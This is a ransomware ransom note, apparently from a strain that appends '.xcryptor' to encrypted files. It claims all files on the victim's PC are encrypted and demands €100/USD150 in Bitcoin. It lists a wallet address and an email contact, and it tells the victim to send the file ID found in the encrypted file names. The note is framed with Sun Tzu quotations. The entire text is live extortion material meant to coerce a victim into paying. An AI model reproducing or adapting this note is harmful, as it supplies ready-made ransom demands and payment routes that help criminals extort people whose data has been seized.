=========================================================================
=	“Be extremely subtle even to the point of formlessness.		=
=	Be extremely mysterious even to the point of soundlessness. 	=
=	Thereby you can be the director of the opponent's fate.”	=
=	― Sun Tzu							=
=========================================================================
------------------------------------------------------------------------------------------
¡IMPORTANT!
------------------------------------------------------------------------------------------
	All files in this PC has been taken, the content of them have been encrypted, the only way 
	to recover your files is two unique keys.

¿HOW TO RECOVER YOUR INFORMATION?
=====================================
PRICE:		€100, USD150 Bitcoins
BC Wallet: 	1HQjC2SkHuUqfbuqEA9RDjSNfNPRhyMBF9
KNOW HOW TO:	https://www.blockchain.com/learning-portal/bitcoin-faq
E-MAIL: 	X.cryp.0.R@gmail.com

NOTE
=====================================

In order to recover your files. Please send me like mail subject the ID that you find in every
file that was encrypted. Example:::  YourPathFile[ID:XXXXXXXXXXXXXXXXXXXXXX].xcryptor

I'M SO SORRY, “Opportunities multiply as they are seized.”
― Sun Tzu
